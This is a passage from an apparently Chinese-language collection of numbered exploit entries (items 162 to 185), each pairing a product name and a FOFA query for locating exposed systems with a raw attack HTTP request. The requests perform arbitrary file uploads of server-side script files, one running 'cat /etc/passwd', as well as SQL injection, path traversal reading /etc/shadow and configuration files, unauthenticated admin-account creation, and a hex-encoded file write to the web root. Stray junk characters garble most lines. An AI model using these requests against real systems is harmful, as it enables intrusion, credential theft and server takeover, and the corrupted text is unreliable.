. E1 @3 O% [0 l9 x- x</UploadResume>- r( t5 H) `2 M* F
</soap:Body>
1 d* @& w1 K9 y" g0 t3 Q' b: p</soap:Envelope>
4 P% f( U( s; w
2 `9 X! B# p* O* E# p. T7 `
5 V' ^# X/ W, k% Dhttp://x.x.x.x/dizxdell.aspx1 ~+ w7 z, {( ^1 { |
, O# t, \" |8 o( Y! X" ?# d162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 o; O3 _9 k1 a! O7 F" G' E
FOFA: app="和丰山海-数字标牌"
, i8 N* B( N- O+ F. g( o6 mPOST /QH.aspx HTTP/1.19 S) s* m; _: J2 @" a
Host: x.x.x.x. w( |5 F# q2 [6 k2 C+ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 t$ e+ [" H# M, F5 c4 p- v
Connection: close
0 u) M1 Q N: T* ^- k3 xContent-Length: 583
, X( c% k7 w/ z8 v9 h9 E7 vContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
+ k# N8 x" `- g# L: b0 wAccept-Encoding: gzip) b: A9 V7 H3 L' U7 |; N" m! m
3 H9 S L3 [3 r' `6 X ~
------WebKitFormBoundaryeegvclmyurlotuey" f6 U3 }- \0 \; A1 f: r/ E5 m
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
& |; @2 y2 i* d2 [Content-Type: application/octet-stream
. R6 V- h+ `# R& Y9 A9 G4 ] f( p, r! R
<% response.write("ujidwqfuuqjalgkvrpqy") %>
+ n7 f. s7 B, K3 [+ v9 r1 O8 w------WebKitFormBoundaryeegvclmyurlotuey
1 _ o; t" t* Y! B. G9 y/ C4 ZContent-Disposition: form-data; name="action"
9 K. \& g6 o0 u6 o& W% H: U+ x/ ~) _! v4 }# ]/ \
upload
5 ~1 h) n) E* L: H8 A# |5 c' W------WebKitFormBoundaryeegvclmyurlotuey
1 ~& ?" P" a6 I; IContent-Disposition: form-data; name="responderId"5 V, a: r2 \2 U5 K5 _/ {! ~, h4 v
4 y1 `! G8 V8 [$ q/ e
ResourceNewResponder# ]4 A) I4 A0 {: k- `
------WebKitFormBoundaryeegvclmyurlotuey' F# h, F6 n# J; z
Content-Disposition: form-data; name="remotePath" l) t! t) T3 w7 I" a8 e
o: Y( H8 }8 ]% h- w/opt/resources4 l1 Q8 {5 ] G6 e
------WebKitFormBoundaryeegvclmyurlotuey--
! d j5 X$ }' O& p
# w) `6 x1 R! {% K0 T5 q$ X/ V3 N3 r7 c) ]& E& p6 K- b+ d" g
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
+ I# r* h. S' J9 P$ ?6 ?2 w5 N2 M) o& I3 r( I N" ~
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 {/ x8 m1 ]4 }' o: G k* `
FOFA: icon_hash="-795291075"1 U6 r4 q! u3 b/ t- V
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
$ H4 s/ @+ d2 sHost: x.x.x.x
1 O, e( ] Q: D* yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" r- g4 P, Y, [1 z2 p. q
Connection: close
! v5 Y% G! `( ?1 x1 A1 l6 @1 t, rContent-Length: 293
4 N3 K' Z' @5 `! W$ sAccept: */*# Y1 V4 y+ p, r
Accept-Encoding: gzip, deflate
* B: g- P- }# @. y- H6 G! d/ ^1 zAccept-Language: zh-CN,zh;q=0.9% r+ @6 P: n! ]1 `0 @% a
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod; i$ t% {9 |8 i6 B5 s/ B8 j7 v
. x$ v& j3 R# z/ B1 T( Z1 j
------iiqvnofupvhdyrcoqyuujyetjvqgocod( g$ x' ~0 u8 ]
Content-Disposition: form-data; name="name"# C- A8 p5 R" w1 Y. Q
$ W% Z7 W8 p. N3 M; g; h0 e1.php, b' C3 A1 z: G5 h4 p4 m. v0 \% H
------iiqvnofupvhdyrcoqyuujyetjvqgocod7 h& G$ L. ?, e; s- R5 x
Content-Disposition: form-data; name="upfile"; filename="1.php"0 k6 _( V) n2 a$ R; C
Content-Type: image/jpeg
) S4 {0 u3 s! R7 d$ c: z S/ I3 T. K. I j+ d0 d/ y
rvjhvbhwwuooyiioxega0 ^/ _; M) D& c Q( g1 V# i
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
% S1 u6 `4 A5 ~& [. O
( _* t& E; S$ `/ E3 S, ~2 S7 |* P( c- V
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
! F& N- l2 h, ~2 u9 lFOFA: title="智慧综合管理平台登入"
8 f |' Z' M0 A4 P& I, }$ SPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
8 P( v) @% H/ L, ~8 K PHost: x.x.x.x: d$ \4 ^# _4 a* W; R* O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0: P( i/ `7 A8 h0 `' E
Content-Length: 288# }9 _/ _2 C! Z
Accept: application/json, text/javascript, */*; q=0.01% S9 j/ t0 a6 ~8 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,: J4 d6 p7 [# T& [
Connection: close! q; f& v- x Y% q. ?, X% @7 R8 Q; I
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
. u3 T3 M2 v# X$ qX-Requested-With: XMLHttpRequest% t; }: K) u. j, g. ^/ u- j
Accept-Encoding: gzip
- j E2 ^2 A9 n% R8 A' B- I4 z2 _# Q, B9 ~
------dqdaieopnozbkapjacdbdthlvtlyl4 U( y3 v; a( P; y" F4 X* v
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"& S# H. z% X7 E4 K+ W
Content-Type: image/jpeg
! s% f% G( o: R1 | W, c: e! w5 b6 v4 h2 s/ h) C$ O: r
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
r3 b1 \( P# k4 {------dqdaieopnozbkapjacdbdthlvtlyl--" ^' b Y! }$ R' Q. f
2 m5 a; v- W# C- T- ?' F% V
( l8 a: ?$ M f* b' j8 |http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
! Q) D' S2 ]. a! }4 J) i2 ?; F0 U" E& X, _
165. OrangeHRM 3.3.3 SQL 注入# a, n/ B8 g- {- b
CVE-2024-364282 g8 Q- l& g* U" O t* a
FOFA: app="OrangeHRM-产品"9 `# z+ I+ ~4 m, B3 @
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))) D. k- e g6 K$ y1 ~, i
8 T0 ]0 q! ]; d. U" @0 P1 S, _1 [$ O9 W8 M
166. 中成科信票务管理平台SeatMapHandler SQL注入% o9 s; z2 y+ d6 e3 P
FOFA:body="技术支持:北京中成科信科技发展有限公司"
2 g4 u, y ]3 p9 MPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1. b( ^ P% b+ x2 t, r6 J
Host:
' J U6 b8 F- R% IPragma: no-cache
7 ?% O# q. i p) @. P9 XCache-Control: no-cache
8 W& ^! _) J, ?$ F! {9 a; oUpgrade-Insecure-Requests: 1& c% t# ^5 m, @+ M; o) b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
; R, g+ |( ~/ S" J7 D( bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" o+ A" b2 q! z) {7 D: p
Accept-Encoding: gzip, deflate
& y1 @( {& u" R& L- z; a! DAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: u4 J( W$ l# e, mCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE, G; j0 v9 R* O. T: u% X
Connection: close+ [- w" T# f+ p: X2 I
Content-Type: application/x-www-form-urlencoded( C0 n+ J/ B* E, F6 j$ n: B
Content-Length: 89
( y* N! ^) k. m) ]* t4 E
# @( j7 k' u4 R- bMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE9 k- @- l6 i8 u
' a5 X. {' U; B, X& u) ~2 k3 k0 f9 w/ k; ~ T
167. 精益价值管理系统 DownLoad.aspx任意文件读取1 Y* E3 B! _. J
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"( P+ E; J/ @8 _
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
0 r# x0 y8 T& @# k+ A- OHost:
9 r, A: r8 e5 o! m, D4 M. BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" A9 K/ l: K# [% }+ P3 G
Content-Type: application/x-www-form-urlencoded
# m4 i. T. \/ O0 m/ W: BAccept-Encoding: gzip, deflate
. F3 E; f( b8 v# LAccept: */*
$ c' k$ p$ O% h+ O- O8 ?Connection: keep-alive
& S& u: ]" b5 R
9 h! f" W# ^5 B( J' h
0 |8 d2 b* q$ Z' e/ z168. 宏景EHR OutputCode 任意文件读取
& I9 }/ \' r8 I! |3 d) ?FOFA:app="HJSOFT-HCM"
( t7 k8 \* s! ` f, VGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1# w. E% l$ Y# I3 I. y9 l/ l' ~4 ~
Host: your-ip
2 S9 y4 e& C2 S2 `/ m, Y# ?" EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
! U+ H) k$ v! jContent-Type: application/x-www-form-urlencoded8 {+ z4 q( E3 P
Connection: close, q! C+ ^/ F4 N4 w; J# W% _. A: C
) Q" l# H i$ V
9 W4 d4 X( I6 R: _' d8 C" O
2 q) S6 ]; t( O+ }. g" o169. 宏景EHR downlawbase SQL注入
5 {+ p; o* U& t1 y; |+ t8 IFOFA:app="HJSOFT-HCM"
5 p" l! u- y r" K) J* oGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* h, }* u6 b7 j% Q, d
Host: your-ip
& o% E. L2 s7 A& c$ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" j+ B* G0 e/ j, Q
Accept: */** o6 t4 h* l+ v* T* T' ?8 G* j0 o# z! v
Accept-Encoding: gzip, deflate& z2 x: @& Y6 H& m# D9 x8 l. B
Connection: close& V# W- j6 J3 ~( @1 F! L( r
" u6 U! K: d: D% r0 S* A
, a3 Y, m, R; `4 t: }
( I* Z7 W8 @" m: I5 |
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
2 S; g# R" y! DFOFA:body="/general/sys/hjaxmanage.js"
4 t- a }7 Z! ?8 mPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
' p2 ?, f# l# y& }- Y, a5 XHost: balalanengliang
$ {$ ~- e k& B" x4 d. |+ c5 XUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: y C) ^1 v- T& F9 J$ e0 A
Content-Type: application/x-www-form-urlencoded' V- p& E) l5 R( f) P
3 L/ x$ c% ?& }9 q; I" W% ~% q
filename=../webapps/ROOT/WEB-INF/web.xml
- d0 S! X }! s. a. u' j9 j. |3 [& ?% R( z" C, p
1 m1 j/ ^9 {- I171. 通天星CMSV6车载定位监控平台 SQL注入; [) U3 C8 J1 w0 q" n
FOFA:body="/808gps/"
' `0 I: w! F4 H5 j+ j3 W# WGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1; N' w$ r/ I: z7 V8 z
Host: your-ip2 A! L W+ U j/ Y; \( G* p" o5 U: I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0/ T6 t; S- X% z. n n
Accept: */*
, u) X% c! S: H) e* {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ r9 t. @ H4 G2 K9 x% M
Accept-Encoding: gzip, deflate7 ^% ] x3 t2 Y5 x3 K5 g+ i
Connection: close
: M3 K+ ~" F$ D' l! f0 B | F0 t. L+ u/ A
& {. h8 L! G0 T) S$ ?" C* `
& A, _. E m6 o( U9 u! ~6 `172. DT-高清车牌识别摄像机任意文件读取/ V# |/ r' Q* ^; b9 A' y
FOFA:app="DT-高清车牌识别摄像机") P1 G& y& B# ]2 A# @# K. u8 E, Y9 C3 j
GET /../../../../etc/passwd HTTP/1.1& V/ C! {- e# X7 f; J
Host: your-ip
8 Q. D3 ]# g, F; SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! Q" ], x F5 l: b0 FAccept-Encoding: gzip, deflate! ^/ @; B+ r a( W1 ?* K6 J5 @
Accept: */*& o Y/ q4 I7 \/ D$ D6 g' `
Connection: keep-alive& k- a- y d/ H5 c4 ~
" W8 b1 k7 c+ i
, q" S, w5 l/ \
- }* R* o8 b2 e9 z& w' m* d173. Check Point 安全网关任意文件读取
1 B# f, r$ A$ I6 o2 iCVE-2024-249192 I& D$ N2 Y6 |5 K8 ]0 ~9 c
FOFA:app="Check_Point-SSL-Network-Extender"
+ A3 b# l# F7 q/ ]+ H CPOST /clients/MyCRL HTTP/1.17 C Y) r( v/ @) x6 Y# \0 x2 D
Host: your-ip+ O" _) b8 `& A$ ?4 z, ~7 `, F
Content-Type: application/x-www-form-urlencoded
$ {! g8 c* z" k4 m F7 Z2 s3 Q# n& i9 z9 Q# C6 T
aCSHELL/../../../../../../../etc/shadow
" q& C: x" C5 q6 n# p& z
! v- T- m+ ^4 m; M! x
" Q7 {7 o1 O, e, Y! Z6 d
0 w. ?; @/ Z" [( r4 i! v174. 金和OA C6 FileDownLoad.aspx 任意文件读取. ?4 r# G4 L; c5 E, u' t3 X- o1 S
FOFA:app="金和网络-金和OA"# E2 d1 X1 u% \9 J1 S. E
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.18 P- x( z& V( s3 _8 g f
Host: your-ip
% @! L4 \; ` ^3 ~4 I$ Y1 u0 |! LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 d. K+ J' d0 Y" v) c5 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# S2 ?) [7 W* x! |9 b0 N
Accept-Encoding: gzip, deflate, br+ }' L, [: L Z) L( v
Accept-Language: zh-CN,zh;q=0.9
! I& J4 H! N% z: X" `Connection: close& X4 M9 R7 V, C
: c0 i1 ?. R C
) g4 Y- t- v5 M/ b" |4 Y& d+ X/ J6 O) ]
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
( W8 _7 q' d0 d, DFOFA:app="金和网络-金和OA"7 U9 _1 @9 x/ Z$ B# j
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
: O7 H w7 F: v8 e, _& `Host:
3 C' Q2 _5 x/ O9 oUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 e. h! X: O5 }# c: X7 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) k$ q2 u. H4 w3 }- B" m: N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' h3 R0 d% V" g2 jAccept-Encoding: gzip, deflate" C& S/ P, T8 a; D1 b
Connection: close
+ q$ n* i; i' q& s$ s8 Z" YUpgrade-Insecure-Requests: 1
7 A; F6 o& R$ w
4 `- k1 x8 g& b' C( p" ]% H& R: j
% p/ u) ~' g; m# K1 ]; ~/ r176. 电信网关配置管理系统 rewrite.php 文件上传
) ?1 r9 P" x" C( m7 Y9 P" hFOFA:body="img/login_bg3.png" && body="系统登录"
6 N$ z1 V x) _8 a0 nPOST /manager/teletext/material/rewrite.php HTTP/1.1: f- U- }( Z8 k8 f# n) s
Host: your-ip
: T f [/ h5 u( y* a$ n# d% m S6 j) SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' `* {; X# s! mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
. S; t2 T1 F; f% W( lConnection: close
( |! Y- e8 x5 _; j# N
+ [ o9 r$ ~! g' }; J6 a------WebKitFormBoundaryOKldnDPT ^ w: D7 c8 u6 v* S
Content-Disposition: form-data; name="tmp_name"; filename="test.php"0 b8 X; j" f7 u
Content-Type: image/png* t, S! u& T+ L
: B. V- d% ~3 h6 T4 V0 X1 o0 o<?php system("cat /etc/passwd");unlink(__FILE__);?>9 q* E9 ]% o$ A, v* T/ \
------WebKitFormBoundaryOKldnDPT8 w1 V7 i+ X U x! `: w8 X
Content-Disposition: form-data; name="uploadtime"
" Y; z- a( h8 D: S$ Y6 j, B$ }
$ K7 C" a$ J X$ ^7 ]6 j ; d/ m5 _* `2 v8 F
------WebKitFormBoundaryOKldnDPT--
& [ d% T& c- `- y6 s5 l7 Q H
8 ?# |4 }+ [% w+ Y% B* S# a1 Z+ L8 _' f5 J& ?2 p
2 T9 g }, h+ O
177. H3C路由器敏感信息泄露, x! Q2 P' J( R
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
4 ~+ ?( _: i2 t7 b y5 I% h6 h/userLogin.asp/../actionpolicy_status/../M60.cfg `6 j0 ~3 d& x9 D3 x: l8 Z% x% B
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
9 t* Q5 y! W$ _7 C$ r# _8 ]/userLogin.asp/../actionpolicy_status/../GR5200.cfg- o4 i. Q4 I+ m5 G* ^6 `! h
/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ H6 C" X+ B+ b9 k# z: H. W
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
8 q: K; r: S# D3 g0 D' _' _% n% F* Y/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
4 N0 p- G8 O/ R9 b: N/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 {) H9 u) D8 q1 X$ e/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
0 B0 B- O% }2 n' Q/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" p5 z4 \# R5 ~
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
! X8 m8 [$ x. W: s0 t$ t# ~. ~& r/userLogin.asp/../actionpolicy_status/../ER5100.cfg
# G* q" ?: I, j. t& c# c: P1 t4 w/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg3 X) c: g6 [- J% w- e7 _7 g1 C$ [
/userLogin.asp/../actionpolicy_status/../ER3260.cfg: d( V* N! U" M# V2 U
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
! z H( N/ `* j! h* A5 _# L8 A/userLogin.asp/../actionpolicy_status/../ER3200.cfg: |* j" {1 ~+ a
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg l4 {1 R0 H5 d6 i' d
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
9 C' b- J7 c/ d! s/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg$ w" M- `# ~6 c: V3 ^4 s1 M; Y
/userLogin.asp/../actionpolicy_status/../ER3100.cfg* a- \$ L V0 ?$ q" B3 K
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg2 P3 s r9 x9 a& j
7 m! I% S) t# y7 U/ r; C$ ~" I3 @# J5 T
. y' e( l; V( i8 R7 N& q178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 y1 }. T4 T3 N3 J' t/ c4 v
FOFA:header="/selfservice"& v5 Q- ^ t8 w
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
; Y$ t; V' ~+ C3 K6 cHost:9 Z5 _, v7 [' s S! n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ _; g* U5 s* vContent-Length: 252
2 B7 J4 \7 _- x, U mAccept-Encoding: gzip, deflate$ F' P% v1 ?5 a3 ^5 F2 P
Connection: close9 X3 A' h8 n+ D
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 l% V1 p* T" l% @+ N-----------------aqutkea7vvanpqy3rh2l9 S% u' E; _7 U
Content-Disposition: form-data; name="12234.txt"; filename="12234"3 H& C( V0 s* Z: P) {; \" n# {* u0 d
Content-Type: application/octet-stream. C. @) G' J6 v& u- |
Content-Length: 255- {, w2 G: _$ g: [) f
$ h$ ?5 H% n: c
12234% ]* E$ d( g/ B6 |/ H" f
-----------------aqutkea7vvanpqy3rh2l--
* c* D3 H$ w4 j2 L8 o
, G. e# t6 L4 |% o- b9 H) b4 E. N1 Q8 m8 b& V7 ~. E9 {
GET /imc/primepush/%2e%2e/flex/12234.txt8 t/ w# G4 e. Z" F# i
9 T# q" Z5 h. ?$ R# e5 D- ^ ]$ V) e. v, I n! o6 y+ m9 B; `
179. 建文工程管理系统存在任意文件读取
# h3 [4 m4 U# z# j! U0 }POST /Common/DownLoad2.aspx HTTP/1.12 P4 {, `" r2 Q+ ?7 g
Host: {{Hostname}}
2 k& c- o( u: r1 j( MContent-Type: application/x-www-form-urlencoded( E3 j1 n4 `6 C! z1 n; `( n; g
User-Agent: Mozilla/5.0
% A+ O( g5 w0 @4 S0 C" u7 ~) h& V/ R' K& i% d8 _0 H0 G3 C
path=../log4net.config&Name=
' V, J; w v. p6 p+ n3 X$ F. ]7 H z
2 s% ]* n& u4 M/ ?+ `
180. 帮管客 CRM jiliyu SQL注入+ ~7 s/ v& W; t0 ?% b e9 Z4 |
FOFA:app="帮管客-CRM"
" x3 }6 E# Q) a) l( b8 T* e) P7 i! }GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.17 `3 X& X1 u% D
Host: your-ip5 g" Z# n o' \1 |+ ?4 [9 y8 u' h* @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) `9 O3 S% L( ~% H; D- U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 o1 ?! b5 l4 r; T1 o. p
Accept-Encoding: gzip, deflate5 g/ J2 X" e- X) P1 U! s$ ^3 T
Accept-Language: zh-CN,zh;q=0.9
( S0 N. l7 `( s" ~$ O) S: rConnection: close/ a9 Q/ j. v2 ?
- w4 x: Y% W l# v& Q/ ^ Q/ M4 F' M( t) x/ [. c2 o
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
& H: X9 M( e' ]8 b" \1 [! nFOFA:"PDCA/js/_publicCom.js"" T* F3 w8 @* z+ }9 S* W* ~
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1" j8 @+ }8 G$ z& Z: g7 Q/ a
Host: your-ip* ? v+ l; _9 M. I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: y0 w% N3 L. L( R3 R$ W9 M' U) QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 E$ p4 S" k3 {Accept-Encoding: gzip, deflate, br
[7 f+ e/ l: X! n5 T; S# l, eAccept-Language: zh-CN,zh;q=0.9! h* g3 P }- J* Z
Connection: close( q8 v9 ^6 }, I
Content-Type: application/x-www-form-urlencoded
$ p) ^: l* A' F4 u5 ]" M: j6 Q
- L8 L, K. `# o0 g" k7 i, P% u4 ]- b" n# H2 }+ p2 w
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
$ e0 _& M7 t4 r( Q2 m+ G0 L8 ^
7 [* d4 N1 N# s) C1 f- o" U" }0 c0 X' A6 L
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' i! }5 K e9 `' z; G' ?
FOFA:"PDCA/js/_publicCom.js"1 h3 c8 e% f/ a4 v$ K9 ^) y
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
1 \# M9 J% n# U' }" q! eHost: your-ip3 \) k. F3 b. Y0 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ F9 n6 E, ^1 {3 H! n" \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. a8 p6 K L- d7 \Accept-Encoding: gzip, deflate, br
6 ?9 c* j" S' k) C0 @; qAccept-Language: zh-CN,zh;q=0.9- w( E" i$ }$ Z( ?$ O! W
Connection: close* I! b1 |& l7 T) A( c
Content-Type: application/x-www-form-urlencoded
3 D% m5 _, P, G$ d( X: f3 g X! k; ~7 ?9 L1 b4 h
+ C8 c1 M8 O l* p3 _) z& Nusername=test1234&pwd=test1234&savedays=1
# w/ k0 w0 z3 C' {9 V) h
% L- }- a; j# y. ?1 N1 K/ X( e. G- H
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入5 ^) C3 t7 M. d9 C7 u
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"3 L2 ?* N" A" b8 d) s/ K1 b
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
2 C0 F; A; O! p4 N. l7 K( {5 @Host: your-ip
) y' {* @5 M5 c' h5 qUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 r1 }5 c) |1 X* h2 |0 N: rAccept-Charset: utf-8
5 q4 T9 R# o6 r+ S* _( {0 JAccept-Encoding: gzip, deflate1 w' N |; Z# u' c! o0 g Q
Connection: close
* w9 K3 l8 V$ t9 R( e% Q# v) ?: Z+ \
) c+ E- \$ O- E$ P
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加: E9 M+ P7 Z- F. P8 A* D
FOFA:server="SunFull-Webs", j5 Z. E+ S8 Q) Q/ s0 e
POST /soap/AddUser HTTP/1.1
- Y* x& s B1 ~8 P) kHost: your-ip$ _" C a# A' O0 j! e$ J
Accept-Encoding: gzip, deflate
# a. @, n, C* c" [, nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
* @& n6 n) f. R1 l* ?' R z4 TAccept: application/xml, text/xml, */*; q=0.01
5 c- ]; ]; w! g OContent-Type: text/xml; charset=utf-8% j& _6 d$ T" v3 n2 u$ {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" e' i+ _0 d3 B) r& T
X-Requested-With: XMLHttpRequest- x: R3 S2 z, K
4 `0 v+ b7 y! N4 R5 ?6 M3 g6 T
' q. {0 G h& jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
5 q9 F: N& m# d& M/ f% @
( T1 R' q# L9 F! j: v
, r3 B8 ]) v3 o8 v r' ^185. 瑞友天翼应用虚拟化系统SQL注入+ I: n" I; X+ i+ y" @6 Z* U
version < 7.0.5.1
' ^) ?1 j- @ h& @2 |6 ZFOFA:app="REALOR-天翼应用虚拟化系统"' J2 K; T* {6 T" A8 B
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
: u( x# y! F3 p2 r( \# OHost: host
